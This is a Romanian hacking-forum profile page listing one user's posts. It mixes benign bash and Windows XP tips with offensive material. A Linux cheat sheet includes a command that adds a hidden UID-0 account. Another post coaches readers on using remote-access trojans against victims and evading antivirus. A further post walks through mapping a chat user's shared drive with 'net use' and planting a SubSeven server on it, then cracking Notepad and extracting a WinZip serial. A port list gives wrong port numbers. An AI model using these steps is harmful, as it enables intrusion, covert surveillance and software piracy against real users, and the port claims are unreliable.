Jump to content

zbeng

Active Members
  • Posts

    2402
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by zbeng

  1. Bash este un limbaj de scripting compatibil cu comenzile de shell care poate fi executat fie din input-ul standard fie dintr-un fisier. Scripturile bash sunt de fapt niste fisiere text pe care le faci executabile, aceste fisiere putand fi editate cu orice editor de text. Aceste scripturi sunt folosite pentru a executa comenzi simple sau complexe fara a le mai scrie mereu. Exista si optiunea de rula aceste scripturi la ce ora dorim cu ajutorul crontab, dar acest lucru in alt tutorial. Toate scripturile bash trebuie sa spuna sitemului de operare ce interpretor folosesc. Astfel prima linie a unui script bash trebuie sa fie: #! /bin/sh Scripturile bash trebuiesc facute executabile. Acest lucru se face cu : chmod +x numescript -------------------------------------------------------------------------------- Script pentru backup Aici este un script care face backup la directorul /etc #! /bin/sh tar -cpvzf /home/backup/backup-`date +"%b%d%y"`.tgz /etc Scriptul va creea o arhiva numita "backup-datacreeri.tgz" in directorul /home/backup pe care l-am creat anterior Poti schimba /etc cu orice alt director la care vrei sa faci backup sa sa adaugi alte directorare dupa /etc, ca de exemplu: *.tgz /etc /root . Acest script trebuie rulat ca root. Daca vrei sa stii ce inseamna fiecare dintre optiunile -cpvzf deschide o consola si da comanda : tar -help -------------------------------------------------------------------------------- Script de shutdown Mai jos se gaseste un script care da shutdown la computer. Apoi se creaza un fisier executabil si este plasat in directorul /usr/bin . Urmatorul pas ar putea fi crearuea unui link catre /usr/bin/shutdown in Menu cu ajutoruk kmenuedit, si computerul poate fi stins cu ajutorul unui click de mouse. #! /bin/sh init 0 (Pentru reboot se foloseste comanda init 6) Script pentru reinnoirea IP-ului? Mai jos gasim un script putin mai complicat. Acesta restareteaza interfata eth0. #! /bin/sh if ifup eth0; then exit 1 else ifdown eth0 echo "done" exit 0 fi
  2. w , uptime = arata de cate zile este serverul sus id, whoami = arata dreptul pe care il avem pe root: apache sau root ls, dir = arata continutul unui folder rm -rf fisier = aterge un folder sau fisier tar chf fisier.tar fisier = Impachetez un fisier tar zcd fisier.tar director = Impachetez un folder ping -c1 yahoo.com = Vad ip la un server /sbin/ipchains -A input --destination-port -p tcp -j REJECT route add -host ip-ul reject = Inchid un port anume cat /proc/cpuinfo = Informatii despre sistem rpm -Uhv arhiva = despachetez arhiva rpm gzip -9 ex.tar = modifik extensia tar in tar.gz /usr/sbin/useradd -o -u 0 http = fak shell cat /etc/issue = vad versiunea de linux gcc program.c -o program = compilez un program df -h = vad cat are hardu /etc/rc.d/init.d = Afisate Pidurile cat /etc/hosts = Vad Vhosturile netstat -aut = VAd cine mai ii pe roata cat /etc/*release = Vad versiunea de linux cat /etc/hosts = Vad hosturile alias ls='dir --color=tty' = Bag ls /usr/sbin/userdel user = Sterg user find / -name ".. " -print -xdev = caut foldere ascunse find / -name ".*" -print -xdev | cat -v = caut foldere ascunse tar zxvf = dezarhivare tar xzvf = dezarhivare passwd = schimbi pass cd .. = Pentru a iesi din director cd ~ = Revii in directorul home , Ex: /home/user1/ ls = Este similara ca si comanda dir din Dos . Afiseaza ce este in directorul curent . ls -al = La fel ca "ls" dar ofera mai multe informatii mv [fisier_vechi] [fisier_nou] = Schimba numele uni fisier. Desemenea cu aceasta comanda poti muta un fisier. Ex: mv putty.txt /scripts/putty.tcl - va muta fisierul putty.tcl in subdirectorul /scripts. mkdir nume = Creeaza un folder pwd = Arata directorul curent. rm [fisier] = Sterge un fisier rm -rf [director] = Pentru a sterge un director care are subdirectoare tar -xf [fisier] = Pentru a extrage o arhiva .tar tar -zxvf [fisier] = Pentru a extrage o arhiva .tar.gz .tgz tar -jxf [fisier] = Pentru a extrage tar.bz2 kill -9 [pid] = Opreste procesul destinat pidului ps x = Pentru a afla pidu unui anumit proces netstat = Arata taote conexiunile sper si in afara serverului. quota = Arata cati spatiu pe hdd ai destinat contului tau ( incercati deasemenea "du -s" ) top = Arata informatii despre server vhosts = Arata vhosturile ( nu toate shellurile au aceasta comanda ) ftp = pentru a instiinta serverul ca d-voastra doriti sa intrati in open'>http://ftp. open [server] = Conecteaza la serverul FTP indicat.Daca conexiunea a fost acceptata va aparea un login si o parola. get [fisier] = Downloadeazaa fisieru respectiv de pe FTP pe shell. mget [fisier1 fisier2 fisierN] = Downloadeaza fisierele de pe http://FTP. Deasemenea poti folosii mget egg* , aceasta comandat downloadeaza toate fisierele care incet cu egg din directorul curent. put fisier = Uploadeaza fisierul pe close'>http://FTP. close = Se inchide conexiunea de la serverul FTP quit = Se inchide programu de FTP
  3. Suntem diferiti. Ne plac lucruri diferite, vrem sa fim unici, incercam sa evitam rutina sau pur si simplu gusturile noastre nu se potrivesc. Aceeasi situatie apare si in relatia dintre utilizator si sistemul de operare. Windows vine intr-o forma neslefuita, dura, si nu toata lumea este dispusa sa il accepte asa. Vom vedea in continuare cateva schimbari utile care il pot face mai 'ascultator'. 1. Pornirea Windows Explorer in folderul ales de tine In mod normal, Windows Explorer este setat sa mearga direct in directorul My Documents la fiecare lansare. Pentru a schimba aceasta situatie, mergeti pe icon-ul sau si cu butonul din dreapta accesati Properties. Schimbati target field-ul cu "%SystemRoot%explorer.exe /e, c:". Il puteti face sa mearga direct in Jocuri sau oricare alt director. Spre exemplu, daca doriti ca la fiecare accesare sa fiti trimis pe My Computer, atunci nu trebuie decat sa introduceti urmatorul target field: "%SystemRoot%Explorer.exe /e,". 2. Invata-ti Windowsul sa se logheze automat pe contul tau Multi poate ati observat ca, la fiecare pornire a Windows-ului, acesta nu mai intra direct in contul vostru de utilizator. Acest lucru se intampla datorita ultimelor update-uri de la Microsoft, mai precis cel pentru .Net Framework, care creaza automat un nou cont de utilizator numit ASP.NET. Din cauza lui, logarea automata este blocata. Bineinteles ca multi va veti gandi ca cele mai simple metode ar fi de a renunta la update-ul respectiv sau de a sterge contul ASP.NET. Iata o metoda si mai simpla pentru a rezolva problema: Accesati Start->Run si scrieti "control userpasswords2". Va aparea o fereastra cu lista utilizatorilor, unde trebuie sa selectati contul dorit si sa debifati optiunea “Users must enter a user name and password to use this computer”. Din pacate, aceasta solutie este valabila doar pentru posesorii de Windows XP Professional. 3. Va grabiti si calculatorul nu vrea sa se inchida mai repede? Pentru a optimiza secventa de Shut Down mergeti la Start->Run si tastati "regedit". Cautati cheia urmatoare: [HKLMSYSTEMCurrentControlSetControlSessionManagerMemory Management]. Dupa ce ati gasit-o, setati valoarea ClearPageFileAtShutdown la 0. De asemenea, daca sunteti utilizatori de Windows XP Professional, puteti sa obtineti acelasi efect accesand Group Policy Editor prin comanda Start->Run->"Secpol.msc". 4. Dupa ce ati folosit ceva timp Windows-ul ruland o multime de programe deodata, probabil ca v-ati dat seama cat de folositor este icon-ul "Show Desktop". Din pacate, cu ceva timp in urma l-ati scos din quick launch. Cum faceti sa il readuceti la locul lui? Folositi urmatoarea metoda: Mergeti la Start->Run si tastati comanda "regsvr32 /n /i:U shell32". Iconita va reaparea instant in Quick Launch. 5. Eliminati afisarea numelui de utilizator si a imaginii aferente din meniul de start Multi se plang de aceasta situatie, considerand ca este deranjanta afisarea acestor informatii in meniul de start. Solutia de a scapa de aceasta afisare (fara a dezactiva Welcome Screen-ul si Windows XP Themes) este urmatoarea: Navigati in „C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account Pictures”, in interiorul caruia veti gasi un fisier BMP cu numele dumneavoastra de utilizator, de genul „smith.bmp”. Redenumiti acel fisier in „smith2.bmp”. Urmatorul pas este sa redenumiti directorul „C:Documents and SettingsAll UsersApplication DataMicrosoftUser Account PicturesDefault Pictures” in „Old_Default Pictures”. Pentru a elimina numele de utilizator folositi Registry Editor (Start->Run->regedit) cautand cheia [HKEY_CURRENT_USERSoftwareMicrosoft WindowsCurrentVersionPoliciesExplorer]. In lista din dreapta setati valoarea NoUserNameInStartMenu la 1. Dupa restart, numele de utilizator si poza nu vor mai fi afisate. 6. Windows-ul uita setarile voastre din Folder Options? Este adevarat. Unii sunt mai meticulosi si isi customizeaza folderele dupa gustul lor estetic, doar ca Windows-ul nu poate memora mai mult de 400 de foldere setate. Totusi, il putem invata sa retina mai mult astfel: folosind Registry editor, mergeti la cheile mentionate mai jos si modificati BagMRU Size la 5000 (sau pana la 8000). Nu depasiti valoarea 8000, recomanda programatorii. [HKEY_CURRENT_USERSoftwareMicrosoftWindowsShell][HKEY_CURRENT_USERSoftwareMicrosoftWindowsShellNoRoam] 7. Setati command prompt-ul sa porneasca in locatia dorita. Este stiut faptul ca la comanda “cmd” din Run se lanseaza command prompt-ul direct in folderul „home” al utilizatorului („C:Documents and Settings”). Pentru a modifica aceasta presetare, folosind regedit, mergeti la cheia [HKEY_CURRENT_USER SoftwareMicrosoft Command Processor] si cautati valoarea „Autorun”. In cazul in care aceasta lipseste, creati un nou REG_SZ si introduceti acolo folderul dorit, precedat de CD (ca la comenzile din MS-DOS). Daca lasati CD simplu, atunci el va porni direct in „C:”. Puteti de asemenea sa tastati „CMD /?” pentru a vedea informatii detaliate despre parametrii comenzii. 8. Uneori nu puteti folosi modul ‘preview” pentru fisiere GIF, JPEG sau HTML in casuta Display Properties. Tastati „REGSVR32 /i SHIMGVW.DLL” si „REGSVR32 /i MSHTML.DLL” in Start->Run pentru a rezolva acest neajuns. 9. Stergeti informatiile referitoare la cautarile anterioare pentru a va proteja intimitatea. Utilizati Registry Editor si cautati [HKEY_CURRENT_USERSoftwareMicrosoftInternet Explorer ExplorerBars FilesNamedMRU]. Acolo veti putea sterge cautarile anterioare. 10. V-a expirat programul de arhivare zip si vreti sa reveniti la functia oferita de Windows XP pentru management-ul arhivelor zip. Din pacate, extensia zip a ramas neasociata dupa dezinstalarea programului folosit anterior. Pentru a reasocia fisierele .zip cu dezarhivatorul integrat de Windows mergeti la Start->Run si tastati „REGSVR32 ZIPFLDR.DLL” sau „cmd /c assoc .zip=CompressedFolder”. Trebuie retinut faptul ca, datorita numarului mare de setari si schimbari ce survin in cazul sistemului de operare Windows, nu putem garanta ca metodele mentionate mai sus vor functiona in totalitate asa cum au fost descrise
  4. 1. Realizezi imaginea care doresti sa-ti apara la incarcarea windowsului in orice program doresti , insa trebuie neaparat sa aiba urmatorele caracteristici: A) sa aiba marimea : 640*480 sa aiba paleta de culori adik Color Depth setata la 16 colors ( 4 bit ) C) sa fie salvata ca si Boot.bmp D) sa fie copiata in C:Windows Bun pana aici . Acum trecem la pasul 2 si anume la Modificarea fisierului boot.ini care se afla in directorul C: dar este hidden nu il veti putea vedea nicicum . 2. Deschizi Control Panel / System dai la Advance , aici Mergi la Startup and Recovery si Dai SETTINGS pana cand ajungi la un window care ar trebui sa arate ca in imaginea din finalul paginii. Aici dai EDIT , si ti se va deschide fisierul boot.ini pe care va trebui sa-l faci sa arate cam asa : [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /fastdetect /noexecute=optin /bootlogo /noguiboot dupa care salvez.
  5. Pentru a putea avea acces la un computer trebuie ca respectivul computer sa aiba deschis un port. Tot ce faceti pe internet se realizeaza prin intermediul unui port, de aceea este important de stiut ce porturi sunt usor de accesat. Daca aspirati sa deveniti hackeri este necesar sa cunoasteti totul despre porturi. __________________________________________________________________________________ Mai departe am sa va prezint o lista de porturi si la ce sunt folosite: Port 80 este portul folosit de HTTP (site-urile web) Port 21 este folosit de Telnet Port 23 este folosit de FTP Port 139 este folosit de NetBios ___________________________________________________________________________________ Urmatoarele porturi sunt folosite de Troieni. impresionant de astfel de programe): port 25 - Ajan, Antigen port 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroat port 59 - DMSetup port 79 - Firehotcker port 80 - Executor, RingZero port 99 - Hidden Port port 110 - ProMail trojan port 113 - Kazimas port 119 - Happy 99 port 121 - JammerKillah port 421 - TCP Wrappers port 456 - Hackers Paradise port 531 - Rasmin port 555 - Ini-Killer, NeTAdmin, Phase Zero, Stealth Spy port 666 - Attack FTP, Back Construction, Cain & Abel, Satanz Backdoor, ServeU, Shadow Phyre port 911 - Dark Shadow port 999 - DeepThroat, WinSatan port 1001 - Silencer, WebEx port 1024 - NetSpy port 1042 - Bla port 1045 - Rasmin port 1090 - Xtreme port 1170 - Psyber Stream Server, Streaming Audio trojan, Voice port 1234 - Ultors Trojan port 1243 - BackDoor-G, SubSeven, SubSeven Apocalypse port 1245 - VooDoo Doll port 1269 - Mavericks Matrix port 1492 - FTP99CMP port 1509 - Psyber Streaming Server port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 1999 - TransScout port 2000 - TransScout port 2001 - TransScout port 2001 - Trojan Cow port 2002 - TransScout port 2003 - TransScout port 2004 - TransScout port 2005 - TransScout port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2155 - Illusion Mailer port 2283 - HVL Rat5 port 2565 - Striker port 2583 - WinCrash port 2600 - Digital RootBeer port 2801 - Phineas Phucker port 3024 - WinCrash port 3128 - RingZero port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3459 - Eclipse 2000 port 3700 - Portal of Doom port 3791 - Eclypse port 4321 - BoBo port 4567 - File Nail port 4590 - ICQTrojan port 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troie port 5011 - One of the Last Trojans (OOTLT) port 5031 - NetMetro port 5321 - Firehotcker port 5400 - Blade Runner, Back Construction port 5401 - Blade Runner, Back Construction port 5402 - Blade Runner, Back Construction port 5550 - Xtcp port 5512 - Illusion Mailer port 5555 - ServeMe port 5556 - BO Facil port 5557 - BO Facil port 5569 - Robo-Hack port 5742 - WinCrash port 6400 - The Thing port 6669 - Vampyre port 6670 - DeepThroat port 6771 - DeepThroat port 6776 - BackDoor-G, SubSeven port 6912 - Shit Heep (not port 69123!) port 6939 - Indoctrination port 6969 - GateCrasher, Priority, IRC 3 port 6970 - GateCrasher port 7000 - Remote Grab, Kazimas port 7789 - Back Door Setup, ICKiller port 8080 - RingZero port 9400 - InCommand port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9876 - Cyber Attacker port 9878 - TransScout port 9989 - iNi-Killer port 10101 - BrainSpy port 10607 - Coma port 11000 - Senna Spy port 11223 - Progenic trojan port 12076 - Gjamer port 12223 - Hack 99 KeyLogger port 12345 - GabanBus, NetBus, Pie Bill Gates, X-bill port 12346 - GabanBus, NetBus, X-bill port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 12631 - WhackJob port 13000 - Senna Spy port 16969 - Priority port 17300 - Kuang2 The Virus port 20000 - Millennium port 20001 - Millennium port 20034 - NetBus 2 Pro port 20203 - Logged port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP, Whack Job port 23476 - Donald Dick port 23477 - Donald Dick port 30029 - AOL Trojan port 30100 - NetSphere port 30101 - NetSphere port 30102 - NetSphere port 30303 - Sockets de Troi port 30999 - Kuang2 port 31336 - Bo Whack port 31337 - Baron Night, BO client, BO2, Bo Facil port 31339 - NetSpy DK port 31666 - BOWhack port 31785 - Hack
  6. 1. Remote Access Trojans (RAT's) Acest tip de troian este cel mai folosit in ultimul timp. Multa lume vrea sa detina un astfel de troian pentru a putea avea acces la harddisk-ul victimei. Folosirea unui astfel de troian nu necesita experienta, fiind foarte usor de utilizat. Trebuie doar sa convingeti pe cineva sa ruleze serverul pe computerul lor dupa care ve-ti afla IP-ul victimei avand astfel acces deplin asupra sistemului pe care a fost rulat serverul. In functie de tipul de "RAT" pe care il folositi ve-ti putea efectua anumite operatii asupra sistemelor infectate. Majoritatea troienilor de acest tip prezinta urmatoarele functi: - keylogger; - upload si download; - realizarea unui screenshot; - controlul asupra anumitor componente ale sistemului infectat (CD-ROM, Webcam); Metoda de conectare la sitemul infectat folosita de RAT's (Remote Access Trojans) o reprezinta deschiderea unui port in computerul infectat, prin care se poate conecta orice hacker. Pentru a putea opri alte persoane sa se conecteze la computerul infectat exista posibilitatea de a-l parola sau de a-i schimba portul. Schimbarea portului deschis este un proces foarte important deoarece nu cred ca este bine ca victima sa constate ca de exemplu portul 1243 este deschis. Aproape saptamanal apar noi astfel de programe ce vin cu noi posibilitati dar care au si abilitatea de a nu fi detectate de anti-virusi. De aceea este recomandat sa folositi in general ultimile versiuni de RAT's aparute, pentru a avea un randament cat mai mare. Folosirea acestor programe presupune o atentie marita deoarece daca nu aveti grija va puteti infecta foarte usor devenind din pradator prada. 2. Password Sending Trojans Scopul acestor troieni este de a afla parolele unui computer iar apoi de a le trimite la o adresa de e-mail specificata fara sa-si dea seama victima. Marea majoritate a acestor troieni nu repornesc de fiecare data cand Windows-ul se incarca si in general folosesc pentru a trimite mail-urile portul 25. Exista cativa astfel de troieni ce trimit mail-uri si cu alte informatii folositoare. 3. FTP Trojans Aceasta categorie de troieni deschid portul 21 pe computerul infectat lasand orice hacker, ce are un client de FTP, sa se conectez la sistemul infectat pentru a putea realiza atat download cat si upload. 4. Keyloggers Keyloggers trojans sunt cei mai simpli troieni. Singura operatie pe care o realizeaza este aceea de a inregistra fiecare tasta apasata de victima. In majoritatea cazurilor acesti troieni repornesc de fiecare data cand se incarca Windows-ul. Prezinta posibilitatea de a lucra atat in mod online cat si in mod offline. In modul online ei inregistreaza si trimit in mod direct informatia. Modul offline este activat in momentul in care victima nu mai este conectata la retea (internet), informatia inregistrata fiind salvata pe harddisk-ul victimei asteptand sa fie transferata. 5. Desctructive Singura functie pe care o realizeaza acesti troieni este de a distruge si sterge fisierele. Sunt cei mai simpli si usor de folosit deoarece pot sterge automat toate fisierele cu extensiile .dll .ini sau .exe din computerul infectat. Sunt foarte periculosi si de indata ce ati fost infectat daca nu va dezinfectati computerul intr-un timp cat mai scurt toata informatia stocata pe harddisk nu va mai exista. Acestea sunt cele mai folosite categori de Troieni. Toti sunt periculosi si ar trebui sa aveti grija cum lucrati cu ei.
  7. zbeng

    just me

    noroc si bun venit pe aici
  8. cred ca acest topic ar trebuiinchis pt ca dezviat tema lui principala
  9. acuam am vazut si eu sincer sa va spun key habar nam unde se pune
  10. include HGL Plataform. Digital HAZARD. Blue Sky AC . BS Hcker poftim si imagine scz mc1 uitasem de ele
  11. mania copy past macar puteai sa faci mirror al programe ca sa mearga downloadate toate si pune credite vezi ca ai un botonas acolo sus unde pune edite
  12. catva jocuri hack 3 cu key cu tot sper sa va placa download http://rapidshare.de/files/23407912/HAck_JOCuri.rar.html
  13. oameni buni sa zis de sute de ori puneti si o mica descriere in romaneste ce va costa romana am incercat imi e tare lene Noua Kr4ck3r lansata vine echipata cu cateva noutati care
  14. mersi virusz de program multumesc Gangsta de link direc;))
  15. zbeng

    Gangsta

    salut si bun venit printe noi Gangsta
  16. zbeng

    Pytbullu

    noroc si bun venit Pytbullu
  17. nul cunosc :@ fiecare cu ale lui
  18. e de la vrajitorul dacal cunosti :@ da lam mai vazut pe 2 site-uri
  19. Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele. Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver. Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu. Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934. Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii. (rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.) Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network" care se gaseste in "control panel" activata. Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan. Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi: c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului} Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele este nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri - Tastati "c:/windows/net use f:IPnebunu" si aveti acces la discul f al fraierului!. Sa explicam aceasta comanda: Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95. IP-adresa lui de ip. f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces. nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP" Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului. Dupa ce dati comanda "c:/windows/net use f:IPnebunu" copiati fisieul "server.exe" pe f: "copy server.exe f:" apoi il executati "f:/server.exe". DISTRACTIE PLACUTA Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti crea un disc virtual x: pe care sa puneti troianul. "net use x:IPtmpparola_dorita/user:ntwak0 "net copy server.exe" C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-D Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare mesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesaj si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie. 1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew 2) cunostinte minime de assembler -dezasamblati programul in w32dasm -activati optiunea "string reference" si cautati sirul "the file is too large..." -veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import -cautati functia User32.messageboxA(responsabile de casetele de dialog in windows) -dati dublu click pe ea si obtineti ceva de genul call dword ptr [00407430] {chemarea procedurii de mesaj} cmp eax,0000006{compara registrul eax cu adresa procedurii} jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni la selectarea lui OK se deschide Wordpad iar altfel iese. Celelalte instructiuni nu mai conteza - -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset -inchideti w32dasm -deschideti Hiew "hiew notepad.exe" -selectati F4 optiunea decode -F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)} -F3 scrieti 404840484048 -F9 pentru a valida introducerea -F5,scrieti numarul pentru jne care este 216A -F3,scrieti 404840484048 -F9 pentru a actualiza si Gata!!! Ce dracu' este 404840484048? 40-in hexazecimal inseamna "inc eax" adica adauga 1 48-inseamna "dec eax" adica scade 1 90 inseamna NOP adica instructiunea nula(nu face nimic) Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1). C-R-A-C-K-I-N-G W-I-N-Z-I-P -deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669 -NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie -scanez in programul dezasamblat 66696669 in hexa -ma duc la adresa indicata cum ar fi 00154:FA14569 -gasesc ceva de genul: mov al,[edx] cmp al,[esi] jnz 00418956 Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memorie in "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!! tutorial facut de vrajitorul
  20. shocker daca tot esti dispus fa un mic "tutoarial" sa zicem
  21. frumos topic....cred ca ar trebui pus ca important
  22. un c++ ok sa s face vil postez cat de curand;)
  23. nai pt ce sa va fie de ajutor...daca e sa va ajut cu vrun tutoriale la cereri si daca stiu va ajut
  24. zbeng

    python

    ok incepator am sa incerc sai fac un miror pe megaupload cand ajung acasa
×
×
  • Create New...